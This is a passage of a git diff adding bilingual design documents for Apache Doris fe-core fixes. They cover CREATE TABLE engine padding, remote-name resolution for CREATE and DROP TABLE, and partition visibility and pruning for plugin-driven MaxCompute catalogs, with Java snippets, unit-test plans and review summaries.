(catalog instanceof PluginDrivenExternalCatalog + && pluginCatalogTypeToEngine((PluginDrivenExternalCatalog) catalog) != null) { + engineName = pluginCatalogTypeToEngine((PluginDrivenExternalCatalog) catalog); + } else { + throw new AnalysisException("Current catalog does not support create table: " + ctlName); + } + ``` + A max_compute PluginDriven catalog gets `engineName = "maxcompute"`. A jdbc/es/trino PluginDriven + catalog (helper returns `null`) falls through to the existing `else` and throws the **same** + "does not support create table" message it already throws today — byte-identical pre/post for + those types. + +3. **`pluginCatalogTypeToEngine` (new `private static`) — RETURNS `null` for unmapped types, does + NOT throw** (refinement over parent design — Rule 7): + ```java + // Maps a PluginDriven (SPI) catalog's type to the legacy engine name used for DDL + // engine-padding / catalog-engine consistency. Keyed on getType() (CatalogFactory key), + // mirroring PluginDrivenExternalTable.getEngine()/getEngineTableTypeName(); the two switches + // must stay in sync if SPI_READY_TYPES gains a CREATE-TABLE-capable full-adopter. + // Returns null for SPI types that do not support CREATE TABLE (jdbc/es/trino-connector), + // so callers preserve their existing behavior for those types. + private static String pluginCatalogTypeToEngine(PluginDrivenExternalCatalog catalog) { + switch (catalog.getType()) { + case "max_compute": + return ENGINE_MAXCOMPUTE; + default: + return null; + } + } + ``` + **Why null, not default-throw (the parent design's version):** the helper is shared by BOTH gate + methods. If it threw for non-max_compute types, then `checkEngineWithCatalog` — which legacy lets + jdbc/es/trino pass through unconditionally (they are not in legacy's instanceof chain) — would + newly throw for a jdbc catalog with an explicit engine. Returning null lets each caller keep + legacy semantics: `paddingEngineName` falls to its existing else-throw; `checkEngineWithCatalog` + simply skips. This makes jdbc/es/trino byte-identical to legacy in **both** methods; only + max_compute gains behavior. + +4. **`checkEngineWithCatalog`** — insert after the MC branch (`:391`), before the `:392` close: + ```java + } else if (catalog instanceof PluginDrivenExternalCatalog) { + String pluginEngine = pluginCatalogTypeToEngine((PluginDrivenExternalCatalog) catalog); + if (pluginEngine != null && !engineName.equals(pluginEngine)) { + throw new AnalysisException("MaxCompute type catalog can only use `maxcompute` engine."); + } + } + ``` + `pluginEngine` is non-null only for max_compute, so the message is only ever reachable for + max_compute and is the **verbatim legacy MC message** (`:391`) — matching the established + convention asserted for sibling catalogs (`test_iceberg_create_table.groovy` / `test_hive_ddl.groovy`: + `" type catalog can only use \`\` engine."`). jdbc/es/trino (pluginEngine == null) + fall through with no throw, exactly as legacy. + +5. **SPI / connector / thrift / BE: no change.** The `Connector` SPI has no engine-name concept; + adding one is over-design. `getType()` is sufficient. Pure fe-core. + +## Implementation Plan (fe-core only) +1. `CreateTableInfo.java`: add the import (§Design 1, exact placement). +2. `CreateTableInfo.java:896-918 paddingEngineName`: insert the PluginDriven branch (§Design 2). +3. `CreateTableInfo.java:376-393 checkEngineWithCatalog`: insert the PluginDriven branch (§Design 4). +4. `CreateTableInfo.java`: add `private static pluginCatalogTypeToEngine` (§Design 3). +5. Gate: `mvn -pl :fe-core -am` (compile + UT); `fe-code-style` Checkstyle (new import must be used + + correctly ordered). Independent commit `[P4-T06d] FIX-DDL-ENGINE`. + +## Risk +- **Regression surface is narrow**: a new branch fires only when (padding) `engineName` is empty AND + catalog is PluginDriven, or (check) catalog is PluginDriven. HMS/Iceberg/Paimon/Internal and + legacy-MC (`instanceof MaxComputeExternalCatalog`, still in keep-set) paths are byte-unchanged + (branch order: after MC, before else / before close). +- **jdbc/es/trino**: byte-identical to legacy in both methods (null-returning helper, §Design 3). + No new capability, no new breakage. Verified non-regressive: pre-fix they already hit the same + `:915` "does not support create table" throw; `ConnectorTableOps.createTable` default also throws. +- **CTAS**: fixed transitively (validateCreateTableAsSelect → paddingEngineName); covered by UT. +- **Follower replay / master sync**: not a concern — engine padding is analysis-time on the receiving + FE; persistence uses `logCreateTable` independent of engineName. +- **getType() string fragility**: depends on the `"max_compute"` literal (CatalogFactory key), same + convention as `PluginDrivenExternalTable.getEngine()`. The helper comment cross-references both so a + future SPI_READY_TYPES key change updates both switches. +- **Checkstyle/import-gate**: one new import, used in 3 places; placement verified (§Design 1). + +## Batch-D ordering (keep-set dependency — must record in decisions-log) +`P4-batchD-maxcompute-removal-design.md:100` plans to delete both +`instanceof MaxComputeExternalCatalog` branches in `CreateTableInfo`. This fix **must land first**; +Batch-D then degrades to "delete only the legacy MC instanceof branches + the +`maxcompute.MaxComputeExternalCatalog` import", leaving the PluginDriven branches (keyed on +getType()) in place. If Batch-D runs first, no-ENGINE CREATE TABLE is permanently broken (the +"amendment self-triggers" pattern). This fix depends on the `MaxComputeExternalCatalog` import +staying in keep-set until Batch-D. (Confirmed `UnboundTableSinkCreator` already has PluginDriven +branches from T06c, so `CreateTableInfo` is the last unwired analysis-time CREATE TABLE gate.) + +## Test Plan +**UT (CI-runnable, fe-core)** — new file +`fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfoEngineCatalogTest.java` +(same package → can construct `CreateTableInfo`; private gate methods invoked via reflection). +Infra (mirrors `PluginDrivenExternalCatalogDdlRoutingTest`): `MockedStatic` → +`mockEnv.getCatalogMgr()` → `mockCatalogMgr.getCatalog("mc_ctl")` returns a +`Mockito.mock(PluginDrivenExternalCatalog.class)` with `getType()` stubbed to `"max_compute"` (a +Mockito mock IS an `instanceof PluginDrivenExternalCatalog`; getType() is non-final). **This +registration via the mocked CatalogMgr is mandatory** because both gate methods look the catalog up +by name (critic correction — a directly-constructed catalog would be ignored). + +Cases (each assertion message encodes WHY — Rule 9; each fails if its branch is reverted): +1. `noEnginePaddedToMaxcomputeForPluginDriven` — `CreateTableInfo` with empty engine, ctl `"mc_ctl"`; + reflectively invoke `paddingEngineName("mc_ctl", null)`; assert `getEngineName() == "maxcompute"`. + WHY: no-ENGINE CREATE TABLE must auto-pad maxcompute, not throw. (Revert branch → throws "does not + support create table" → red.) +2. `ctasNoEnginePaddedToMaxcompute` — drive the **CTAS** entry point + `validateCreateTableAsSelect(["mc_ctl"], , ctx)` far enough to assert padding ran (assert + `getEngineName() == "maxcompute"` after the call, or that it does not throw "does not support + create table"). Covers the CTAS path the parent design omitted. (If `validate(ctx)` downstream is + too heavy to run headless, assert via `paddingEngineName` re-invocation parity + a focused + `assertDoesNotThrow` up to the padding point; final form decided at implementation against what + runs offline.) +3. `wrongExplicitEngineRejectedForPluginDriven` (Rule-9 mirror test) — set `engineName="hive"`, + ctl `"mc_ctl"`; reflectively invoke `checkEngineWithCatalog()`; assert `AnalysisException` + thrown. WHY: catalog-engine consistency must still hold under PluginDriven. **This fails (no + throw) if the checkEngineWithCatalog branch is absent** — proving the mirror branch against its + intent (the parent design had no such test; the branch would otherwise be untestable per Rule 9). +4. `correctExplicitEnginePassesForPluginDriven` — `engineName="maxcompute"`, + `checkEngineWithCatalog()` does not throw (locks that the check is a consistency gate, not a + blanket reject). +5. `jdbcPluginDrivenStillUnsupported` — getType() stubbed `"jdbc"`; `paddingEngineName` (empty + engine) throws "does not support create table" (helper returns null → existing else); and + `checkEngineWithCatalog` with any explicit engine does NOT throw (mirrors legacy pass-through). + Locks the null-returning-helper decision (§Design 3) against regression. + +Reflection helper unwraps `InvocationTargetException` to rethrow the cause so `assertThrows` +sees `AnalysisException` directly. + +**E2E (NOT run in normal CI — needs live ODPS):** +`regression-test/suites/external_table_p2/maxcompute/test_max_compute_create_table.groovy` Test1 +(`:62-71`, no-ENGINE Basic CREATE TABLE) is the natural assertion point: under cutover it must go +from FAIL → PASS (CREATE TABLE succeeds, `show tables like` hits, `qt_test1_show_create_table` +renders without error). **Do NOT add the parent design's proposed extra assertion +"SHOW CREATE TABLE output contains `ENGINE=maxcompute`"** (critic correction): SHOW CREATE TABLE +renders `ENGINE=` + `getEngineTableTypeName()` = `"MAX_COMPUTE_EXTERNAL_TABLE"` (the recorded `.out` +baseline line 3 confirms `ENGINE=MAX_COMPUTE_EXTERNAL_TABLE`), NOT `maxcompute`. The analysis-time +engineName (`"maxcompute"`, used for padding/validation) is a different value from the display-time +table-type name. The existing `qt_test1_show_create_table` already covers the regression correctly; +no extra assertion needed. + +## Resolved Open Questions +- Helper default for jdbc/es/trino: **return null** (not throw) so both gates mirror legacy for those + types; revisit when a second connector full-adopts CREATE TABLE. +- `checkEngineWithCatalog` message: **verbatim legacy MC string** (`"MaxCompute type catalog can only + use \`maxcompute\` engine."`) — only reachable for max_compute, matches the in-repo convention; + UT asserts on exception **type**, not the string, to avoid brittleness. +- `"max_compute"→"maxcompute"` mapping kept as a local literal in the helper (minimal change) with a + cross-reference comment to `PluginDrivenExternalTable.getEngine()` rather than extracting a shared + constant. + +## Summary (post-implementation, 2026-06-07) +**Status: DONE — implemented, verified, reviewed (sound, 1 round), ready to commit.** + +- **Change**: `CreateTableInfo.java` — `import org.apache.doris.datasource.PluginDrivenExternalCatalog;` + (after `:49 InternalCatalog`); PluginDriven branch in `paddingEngineName` (after the MC branch) and + in `checkEngineWithCatalog` (after the MC branch); new `private static pluginCatalogTypeToEngine` + (`"max_compute"`→`ENGINE_MAXCOMPUTE`, else `null`). New UT + `CreateTableInfoEngineCatalogTest` (5 cases). fe-core only; no SPI/connector/thrift/BE change. +- **Verification** (real Maven exits, not background-task echoes): + - `mvn -pl :fe-core -am test -Dtest=CreateTableInfoEngineCatalogTest` → Tests run: 5, Failures: 0, + Errors: 0; BUILD SUCCESS. + - Rule-9 mutation (helper returns `null` for `max_compute`): tests 1/2/3 go red (no-ENGINE throw / + `expected: but was:` / "nothing was thrown"); restore → 5/5 green. + - `mvn -pl :fe-core checkstyle:check` → 0 violations. +- **Adversarial review** (`wf_e8887334-53a`, 4 clean-room reviewers → verify → cross-check): + verdict **sound**, 1 round. 6 raw findings → 1 confirmed = a single **nit** + (`correctExplicitEnginePassesForPluginDriven` is vacuous as a regression detector for its branch), + disposition **acceptable-as-is** — the real guard for that branch is the sibling + `wrongExplicitEngineRejectedForPluginDriven` (confirmed pre-fix-red). All 6 design corrections + confirmed present in code; no code↔design contradictions; no blocker/major. See + `plan-doc/reviews/P4-T06d-FIX-DDL-ENGINE-review-rounds.md`. +- **Batch-D ordering** (must record in decisions-log): this fix lands the PluginDriven branches FIRST; + Batch-D then deletes only the legacy `instanceof MaxComputeExternalCatalog` branches + the + `maxcompute.MaxComputeExternalCatalog` import, leaving the getType()-keyed PluginDriven branches. diff --git a/plan-doc/tasks/designs/P4-T06d-FIX-DDL-REMOTE-design.md b/plan-doc/tasks/designs/P4-T06d-FIX-DDL-REMOTE-design.md new file mode 100644 index 00000000000000..771caa927640c5 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06d-FIX-DDL-REMOTE-design.md @@ -0,0 +1,124 @@ +# P4-T06d · FIX-DDL-REMOTE — DDL 远端名解析(CREATE/DROP TABLE) + +> issue 4 / 6,phase 2 DDL,sev=major,layer=fe-core,depends_on=DDL-P1(FIX-DDL-ENGINE,已落 `0d95d837924`,CREATE 分析期网关已通,本 override 现可达)。 +> 来源: `P4-cutover-fix-design.md` §FIX-DDL-REMOTE(:227-294,verdict=needs-revision)+ review DDL-P3/DDL-C2。 +> 本文档已折入 parent critic 的全部 corrections/gaps/额外风险(逐条标 ✅),并据**当前代码树重新推导**(parent 的行号/包路径偏差已校正)。 + +## Problem + +翻闸到 `PluginDrivenExternalCatalog` 后,对**启用名映射**的 catalog(`lower_case_meta_names=true` / `lower_case_database_names=1|2` / `meta_names_mapping`,使本地展示名 ≠ ODPS 远端真名)执行 `CREATE TABLE` / `DROP TABLE` 时,FE 把**本地名**原样透传给连接器 → 连接器原样喂 ODPS SDK: + +- `CREATE TABLE`:在错误大小写/映射后的库名下建表,或建到不存在的库报错。 +- `DROP TABLE`:用本地名查 ODPS 定位不到真实表 → `IF EXISTS` 静默不删(残表)/ 非 `IF EXISTS` 误报"表不存在"。 + +触发条件:catalog 开启上述任一名映射且本地名≠远端名。未开映射时本地名==远端名(`getRemoteName()` 的 `Strings.isNullOrEmpty` 兜底,`ExternalDatabase.java:408` / `ExternalTable.java:167`),行为不变 —— 这解释为何默认 gate/e2e 未暴露。legacy 可用、翻闸即坏的**数据正确性回归**(review DDL-P3/DDL-C2,regression=yes)。 + +## Root Cause(行号据当前树校正 ✅ parent gap-5) + +- **CREATE**:`PluginDrivenExternalCatalog.java:267-268` `convert(createTableInfo, createTableInfo.getDbName())` 传**本地** dbName;converter `connector/ddl/CreateTableInfoToConnectorRequestConverter.java:60-64` 用该 dbName 作 `.dbName(dbName)`,表名恒 `info.getTableName()`(本地)。连接器 `MaxComputeConnectorMetadata` 原样喂 SDK。 +- **DROP**:`PluginDrivenExternalCatalog.java:359` 用本地 `dbName`/`tableName` 直调 `metadata.getTableHandle(session, dbName, tableName)`,零 local→remote 解析。 +- **Legacy 基线(须 mirror)**: + - `MaxComputeMetadataOps.createTableImpl:172-176` db null→`UserException("Failed to get database ...")`;`:179`/`:219` 用 `db.getRemoteName()` 作 dbName;表名保持 `createTableInfo.getTableName()`(**CREATE 不解析远端表名** —— 表尚不存在,无本地→远端映射)。 + - `MaxComputeMetadataOps.dropTableImpl:266-267` 用 `dorisTable.getRemoteDbName()` 与 `dorisTable.getRemoteName()`;该 `dorisTable` 由 **base `ExternalCatalog.dropTable:1119-1128`** 预解析(getDbNullable→db null 无条件抛;db.getTableNullable→table null 时 ifExists 返回否则抛)后传入 —— 即 legacy MC DROP 的可观察行为 == base.dropTable 的控制流。 + +## Design + +remote 解析放 **FE(`PluginDrivenExternalCatalog`)**,**不扩 SPI、不改连接器**(连接器契约保持"接收即远端名,原样发 SDK")。keyed on 通用 `ExternalDatabase.getRemoteName` / `ExternalTable.getRemoteDbName/getRemoteName` API,非 hardcode maxcompute → 任何 full-adopter 复用。 + +### createTable override(`:263-287`) +在 `convert(...)` 前插入 db 解析: +```java +ExternalDatabase db = getDbNullable(createTableInfo.getDbName()); +if (db == null) { + throw new DdlException("Failed to get database: '" + createTableInfo.getDbName() + + "' in catalog: " + getName()); +} +... convert(createTableInfo, db.getRemoteName()); // 第二参由本地名→远端名 +``` +- 表名保持 converter 内 `info.getTableName()` 原始值。**CREATE 不解析远端表名**(legacy parity)。✅ parent correction-2 / RESUME 约束 4:**显式登记为 non-goal**。 +- editlog(`persist.CreateTableInfo`,本地名)与缓存失效(`getDbForReplay(...).ifPresent`,本地名)**不变**。 +- ⚠️ **变量遮蔽**:既有 `getDbForReplay(...).ifPresent(db -> db.resetMetaCacheNames())` 的 lambda 形参 `db` 与新 local `db` 冲突 → lambda 形参改名 `d`。 + +### dropTable override(`:353-374`)—— 精确 mirror base `ExternalCatalog.dropTable:1114-1138` +```java +makeSureInitialized(); +ExternalDatabase db = getDbNullable(dbName); +if (db == null) { + throw new DdlException("Failed to get database: '" + dbName + "' in catalog: " + getName()); // 无条件抛 +} +ExternalTable dorisTable = db.getTableNullable(tableName); +if (dorisTable == null) { + if (ifExists) { return; } + throw new DdlException("Failed to get table: '" + tableName + "' in database: " + dbName); +} +ConnectorSession session = buildConnectorSession(); +ConnectorMetadata metadata = connector.getMetadata(session); +Optional handle = metadata.getTableHandle( + session, dorisTable.getRemoteDbName(), dorisTable.getRemoteName()); // 远端名 +if (!handle.isPresent()) { // 保留:FE 缓存有表但远端已被带外删除 + if (ifExists) { return; } + throw new DdlException("Failed to get table: '" + tableName + "' in database: " + dbName); +} +... metadata.dropTable(session, handle.get()); +... logDropTable(new DropInfo(getName(), dbName, tableName)); // 本地名 +... getDbForReplay(dbName).ifPresent(d -> d.unregisterTable(tableName)); // 本地名,lambda 形参 d +``` + +**🔴 Rule-7 决策(surface conflict)**:parent 设计文本说"db==null 时按 ifExists 干净返回 / 否则抛"。**与 base 实际不符**:base `ExternalCatalog.dropTable:1120-1122` 对 db==null **无条件抛**(不看 ifExists),只有 table==null 才 ifExists-gated。legacy MC DROP 走的正是此 base 方法 → **精确 legacy 可观察行为 = db==null 无条件抛**。本设计取 base/legacy(无条件抛),推翻 parent 文本的 ifExists-gate 描述。理由:更 tested(base 是权威已测路径)+ 精确 parity。`dropDb` override(`:327`)对 db==null 做 ifExists-gate 是另一回事(mirror 的是 legacy `dropDbImpl:133-141`,语义不同,不混淆)。 + +- 三道闸全保留:① db==null(无条件抛)② dorisTable==null(ifExists)③ handle 远端不存在(ifExists)。第③道是现状已有、本 fix 保留 —— 覆盖"FE 缓存有表/远端带外已删"。✅ parent gap-4。 +- `getDbNullable`+`getTableNullable` 移到 `buildConnectorSession()` 之前:table 不存在时连 `connector.getMetadata` 都不调(测试可 `verifyNoInteractions(metadata)`)。 + +## 须显式登记的偏差 / non-goal(Rule 12 fail loud) + +1. ✅ **parent correction-1**:parent Risk 称"加 getDbNullable 把库不存在异常从连接器 OdpsException→RuntimeException 变 FE DdlException,属改进"——**before-state 描述不准**。max_compute 的 `getTableHandle` 对缺库不抛,走 `structureHelper.tableExist`→false→`Optional.empty()`→现状已抛 FE `DdlException "Failed to get table"`(`:364`),非 RuntimeException。本 fix 的改进是真实的(报错从"table"细化为"database"层级 + 命中正确远端对象),但**纠正**:before 不是 OdpsException/RuntimeException。 +2. ✅ **parent correction-2 / RESUME 约束 4**:CREATE 不解析远端表名,**显式 non-goal**。且 legacy createTableImpl 还有两道 FE 侧存在性校验(`tableExist` 远端 db `:179` + `getTableNullable` `:189`)本 override **不复刻**(交连接器自己的 ifNotExists/存在性校验)—— pre-existing divergence,本 fix 不闭合不扩范围,显式登记为 non-goal(非 DDL-C6 范围)。 +3. ✅ **parent gap-2 / RESUME 约束 2 — SHARED-OVERRIDE blast radius**:`CatalogFactory SPI_READY_TYPES={jdbc, es, trino-connector, max_compute}`,createTable/dropTable 由**四者共享**(EsConnectorMetadata/JdbcConnectorMetadata/TrinoConnectorDorisMetadata 均不 override)。对 jdbc/es/trino: + - DROP:新增 `getDbNullable`+`getTableNullable`(可触远端往返,`ExternalDatabase.getTableNullable:476` → makeSureInitialized + 可能 listTableNames),随后 `metadata.dropTable` 仍走 `ConnectorTableOps.dropTable` default **throw "not supported"**。**end-state 仍 throw,无功能回归**(它们本就不支持 DROP),但控制流 + 可能的报错文案 + 一次远端往返为新增 —— **登记,不 guard**(guard = 过度设计,失败路径上的额外往返无害)。 + - CREATE:新增 `getDbNullable`(缺库改抛"Failed to get database"),库存在则 `createTable` 仍 throw "not supported"。end-state 仍 throw。 +4. ✅ **parent gap-3 / RESUME 约束 3 — "逐字节一致"不成立**:即便**未开名映射**,本 fix 也改变了**FE 侧控制流**(新增 getDbNullable+getTableNullable 解析、可能远端校验、db 缺失异常层级变化)。parent Risk 的"逐字节一致"**仅对发往 SDK 的名字成立**,对 FE 控制流不成立 —— 纠正措辞。 +5. ✅ **parent 额外风险-1 — master 写路径延迟/失败面**:`getDbNullable`/`getTableNullable` 在 master 上可触发 lazy metaCache build / 远端往返;ODPS 慢/不可达时 CREATE/DROP 会在 SDK 调用前 block 于元数据解析。轻微延迟/失败面变化,登记。 +6. ✅ **parent 额外风险-2**:`dorisTable.getRemoteDbName()` == 其 parent db 的 `getRemoteName()`(`ExternalTable.java:536`);与单独 `getDbNullable` 取的 db 应同对象,并发刷新理论上瞬时分歧 —— 与 base dropTable 结构相同,非新增风险,登记不处理。 +7. **READ-only 影响面**:本 fix 不触 BE/thrift/连接器/SPI;editlog/缓存键仍用本地名 → follower replay 一致(`replayDropTable` 走本地名分支,不受影响)。 + +## Implementation Plan + +| # | 层 | 文件 | 改动 | +|---|---|---|---| +| 1 | fe-core | `PluginDrivenExternalCatalog.java` createTable(:264-287) | 插 getDbNullable+null 校验;`convert` 第二参→`db.getRemoteName()`;cache-invalidation lambda 形参 `db`→`d` | +| 2 | fe-core | `PluginDrivenExternalCatalog.java` dropTable(:353-374) | 插 getDbNullable(无条件抛)+getTableNullable(ifExists);getTableHandle 用 remote 名;保留 handle-absent 闸;unregister lambda 形参 `db`→`d` | +| — | — | imports | `ExternalDatabase`/`ExternalTable` 同包 `org.apache.doris.datasource`,**无需 import**;`ConnectorMetadata`/`ConnectorTableHandle`/`Optional` 已 import | + +不触:fe-connector-maxcompute / fe-connector-api / be / thrift。守门:`-pl :fe-core -am` + `fe-code-style`(Checkstyle)。本 issue 独立 commit `[P4-T06d] ... [FIX-DDL-REMOTE]`。 + +## Test Plan(UT,fe-core,`-pl :fe-core -am`) + +扩 `PluginDrivenExternalCatalogDdlRoutingTest.java`。**✅ parent gap-1 / RESUME 约束 1 — 既有 5 用例必 rewrite(非"扩"),否则套件变红(Rule 12 fail loud)**:`getDbNullable` 默认返回 `dbNullableResult`(默认 null);新前置令 4 drop 用例(`testDropTableResolvesHandleRoutesAndUnregisters:176` / `IfExistsWhenMissing:190` / `MissingWithoutIfExistsThrows:200` / `WrapsConnectorException:209`)+ 1 createTable 用例(`testCreateTableInvalidatesDbCache:223`)在 getDbNullable/getTableNullable 阶段即抛/改道 → 须 stub `dbNullableResult` + `db.getTableNullable(...)`。 + +新增/重写用例(每条编码 WHY,mutation 自证): + +**CREATE** +- `testCreateTablePassesRemoteDbNameToConverter`(新)—— stub `db.getRemoteName()="DB1"`(local `db1`);**✅ parent 额外风险-4 / RESUME 约束 5**:**不能**用 `argThat(req->req.getDbName()...)`(converter 被 mock,返回 stub req 与 dbName 无关 → vacuous)。改为 `conv.verify(() -> convert(info, "DB1"))` **捕 convert() 第二参**。mutation(传 `createTableInfo.getDbName()` 本地名)令其红。 +- `testCreateTableMissingDbThrows`(新)—— `dbNullableResult=null` → DdlException + `verifyNoInteractions(metadata)`。 +- `testCreateTableInvalidatesDbCache`(重写)—— 补 `dbNullableResult`(stub getRemoteName)+ `dbForReplayResult`,断言 `createTable(session, req)` + `resetMetaCacheNames()`。 + +**DROP** +- `testDropTableResolvesRemoteNamesRoutesAndUnregisters`(重写 :176)—— local `db1.t1` → remote `DB1.TBL1`;断言 `getTableHandle(session, "DB1", "TBL1")`(远端名)+ `dropTable` + `logDropTable` + `unregisterTable("t1")`(本地名)。同时满足 critic 的 `testDropTableUsesRemoteDbAndTableName` 需求。mutation(用本地名调 getTableHandle)令其红。 +- `testDropTableMissingDbThrowsEvenWithIfExists`(新)—— `dbNullableResult=null`,`ifExists=true` → 仍 DdlException(编码 Rule-7 决策:db 缺失无条件抛,mirror base)。mutation(ifExists-gate db==null)令其红。 +- `testDropTableIfExistsWhenMissingTableIsNoop`(重写 :190)—— db 在、`getTableNullable→null`、ifExists → no-op + `verifyNoInteractions(metadata)`。 +- `testDropTableMissingTableWithoutIfExistsThrows`(重写 :200)—— db 在、table null、!ifExists → throw + `verifyNoInteractions(metadata)`。 +- `testDropTableHandleAbsentAfterLocalResolveIsNoopWithIfExists` / `...ThrowsWithoutIfExists`(新)—— **✅ parent gap-4**:db+table 本地解析成功,但 `getTableHandle(remote)→empty`(带外远端删除),ifExists→no-op、!ifExists→throw;断言 `getTableHandle` 被调、`dropTable` 不被调。 +- `testDropTableWrapsConnectorException`(重写 :209)—— 远端名解析成功 + handle 在 + `dropTable` 抛 DorisConnectorException → 包成 DdlException。 + +E2E(需 live ODPS + `lower_case_meta_names`,user-run,CI 默认跳过): +- ✅ parent 额外风险-3:E2E 仅在 ODPS 端真实存在混合大小写库时才能证伪 pre-fix(否则 local==remote 退化为 green 假证)。**登记:CI-runnable 守门仅 UT;E2E 标记需 live MC + 预置混合大小写远端对象**。 +- `regression-test/suites/external_table_p2/maxcompute/` 扩一支:开 `"lower_case_meta_names"="true"`,断言 CREATE 后 ODPS 真名库存在可 SELECT、`DROP TABLE IF EXISTS` 后 `SHOW TABLES` 不含该表、对照未开映射不变。 + +## 成功标准 +编译过 + Checkstyle=0 + 新/改 UT 全绿且 mutation 自证(用本地名调 getTableHandle/convert 令对应 test 红)+ 对抗 review 收敛(≤5 轮)。 + +## Review 轮次(2 轮收敛) +详见 `plan-doc/reviews/P4-T06d-FIX-DDL-REMOTE-review-rounds.md`。 +- **Round 1** `needs-revision`: 3 findings,全 test-quality(F3/F6/F12),production code CLEAN —— 测试只锁 REMOTE 名半边,未锁 editlog/`getDbForReplay` 的 LOCAL 名半边(follower-replay 不变式)。修法 test-only:`ArgumentCaptor` 断言 `persist.CreateTableInfo`/`DropInfo` 携本地名 + `lastGetDbForReplayArg` 断言 + drop happy-path 分离 resolution/replay db。 +- **Round 2** `converged`: 3 lens 一致 resolved,无新缺陷。 +- mutation 总账:round-1(remote 解析 + db-null 无条件抛)5 红 + round-2(editlog/getDbForReplay LOCAL 名)2 红。最终 UT 17/17、CS=0、BUILD SUCCESS。 diff --git a/plan-doc/tasks/designs/P4-T06d-FIX-PART-GATES-design.md b/plan-doc/tasks/designs/P4-T06d-FIX-PART-GATES-design.md new file mode 100644 index 00000000000000..ad4c645436c653 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06d-FIX-PART-GATES-design.md @@ -0,0 +1,133 @@ +# P4-T06d · FIX-PART-GATES — 分区可见(SHOW PARTITIONS / partitions() TVF)+ 分区裁剪恢复 + +> issue 5 / 6,phase 3 分区,sev=major,layer=fe-core(+新 cache 类)。来源: `P4-cutover-fix-design.md` §FIX-PART-GATES(:300-389,verdict=needs-revision)+ review DDL-C1/CACHE-C1/CACHE-C2 + READ-P3/CACHE-C-SELECT/CACHE-P1。 +> **用户决策(2026-06-07)**: OQ-6 = **(b) 新增 `PluginDrivenSchemaCacheValue` 缓存子类**(非每次重取);scope = **一并恢复分区裁剪**(`supportInternalPartitionPruned` + `getNameToPartitionItems`)。 +> 已据 recon(workflow `wvccvhv38`,7 readers)+ 当前代码树重新推导;parent critic 5 项更正全折入(逐条标 ✅)。 + +## Problem(翻闸即坏,3 缺口) +翻闸后 MC catalog = `PluginDrivenExternalCatalog`,表 = `PLUGIN_EXTERNAL_TABLE`。对真实分区 MC 表: +1. **DDL-C1/CACHE-C1** `SELECT * FROM partitions(...)` → `PartitionsTableValuedFunction` analyze 双网关(catalog allow-list + table-type)不含 PluginDriven → 抛 `AnalysisException`/`MetaNotFound`;已接好的 BE handler(`MetadataGenerator.dealPluginDrivenCatalog`)成死代码。 +2. **CACHE-C2** `SHOW PARTITIONS` → `ShowPartitionsCommand:263-266` 调 `table.isPartitionedTable()`,`PluginDrivenExternalTable` 无 override → `TableIf` default false → 抛 "is not a partitioned table"。(T06c 已接 allow-list/表类型/dispatch/handler,独缺此门。) +3. **READ-P3/CACHE-C-SELECT** 分区裁剪丢失 → `PluginDrivenExternalTable` 不暴露任何分区 API(`getPartitionColumns`/`getNameToPartitionItems`/`supportInternalPartitionPruned` 全默认)→ 大分区表退化整表扫。 + +## Root Cause +- `PluginDrivenExternalTable.initSchema()`(:78-109)取 `ConnectorTableSchema` 后**丢弃 `getProperties()`**(含 `partition_columns` prop,producer `MaxComputeConnectorMetadata.java:160`),只 `new SchemaCacheValue(columns)`(base 类,无 partition 字段)→ 无处可读分区列。 +- 无分区 API override → `ExternalTable` 默认 `getPartitionColumns`=empty(:468)、`getNameToPartitionItems`=empty(:457)、`supportInternalPartitionPruned`=false(:478);`TableIf.isPartitionedTable`=false(:364)。 +- `PartitionsTableValuedFunction.analyze()`(:172-176 catalog allow-list、:184-185 table-type、:200-204 非分区守卫)keyed on legacy `MaxComputeExternalCatalog`/`MAX_COMPUTE_EXTERNAL_TABLE`,无 PluginDriven 分支(eager analyze in ctor :149/:131)。 + +## Design + +### A. 新增 `PluginDrivenSchemaCacheValue`(OQ-6=b) +`fe/fe-core/.../datasource/PluginDrivenSchemaCacheValue.java`,extends `SchemaCacheValue`,mirror `HMSSchemaCacheValue` 最小模式但多存 remote 名: +```java +public class PluginDrivenSchemaCacheValue extends SchemaCacheValue { + private final List partitionColumns; // Doris 列(mapped 名),供 getPartitionColumns + types + private final List partitionColumnRemoteNames; // raw 远端名,供索引 ConnectorPartitionInfo.values + public PluginDrivenSchemaCacheValue(List schema, List partitionColumns, + List partitionColumnRemoteNames) { super(schema); ... } + public List getPartitionColumns() { return partitionColumns; } + public List getPartitionColumnRemoteNames() { return partitionColumnRemoteNames; } +} +``` +✅ **parent gap PROP-SOURCING**: 用缓存子类(非每次 `getTableSchema()` 重取),mirror legacy 缓存、避热路径远端往返。✅ **parent gap COLUMN-NAME-MAPPING**: 同时存 raw + mapped 名,解析时把 prop 的 raw 名经 `fromRemoteColumnName` 映射后匹配 mapped 列(MC 默认 identity,但通用对 remapping 连接器成立)。 + +### B. `PluginDrivenExternalTable.initSchema()` 扩展(填充分区列) +在现有 mapped columns 之后,读 `partition_columns` prop、解析 raw→mapped、过滤出分区 Doris 列,产 `PluginDrivenSchemaCacheValue`: +```java +List columns = ConnectorColumnConverter.convertColumns(mappedColumns); +// partition_columns prop = raw 远端列名 CSV(producer: MaxComputeConnectorMetadata:160) +List partitionColumns = new ArrayList<>(); +List partitionColumnRemoteNames = new ArrayList<>(); +String partProp = tableSchema.getProperties().get("partition_columns"); +if (partProp != null && !partProp.isEmpty()) { + Map byName = columns.stream().collect(toMap(Column::getName, c->c, (a,b)->a)); + for (String rawName : partProp.split(",")) { + rawName = rawName.trim(); + if (rawName.isEmpty()) continue; + String mapped = metadata.fromRemoteColumnName(session, dbName, tableName, rawName); + Column col = byName.get(mapped); + if (col != null) { partitionColumns.add(col); partitionColumnRemoteNames.add(rawName); } + } +} +return Optional.of(new PluginDrivenSchemaCacheValue(columns, partitionColumns, partitionColumnRemoteNames)); +``` +注:`columns` 已含分区列(连接器 `initSchema` append,mirror legacy);此处仅**标识**哪几列是分区列,不重复加列。 + +### C. `PluginDrivenExternalTable` 分区 API override(mirror legacy MaxComputeExternalTable:83-114) +```java +@Override public boolean isPartitionedTable() { makeSureInitialized(); return !getPartitionColumns().isEmpty(); } // CACHE-C2 门 +@Override public List getPartitionColumns(Optional s) { return getPartitionColumns(); } +public List getPartitionColumns() { // 读缓存子类 + makeSureInitialized(); + return getSchemaCacheValue().map(v -> 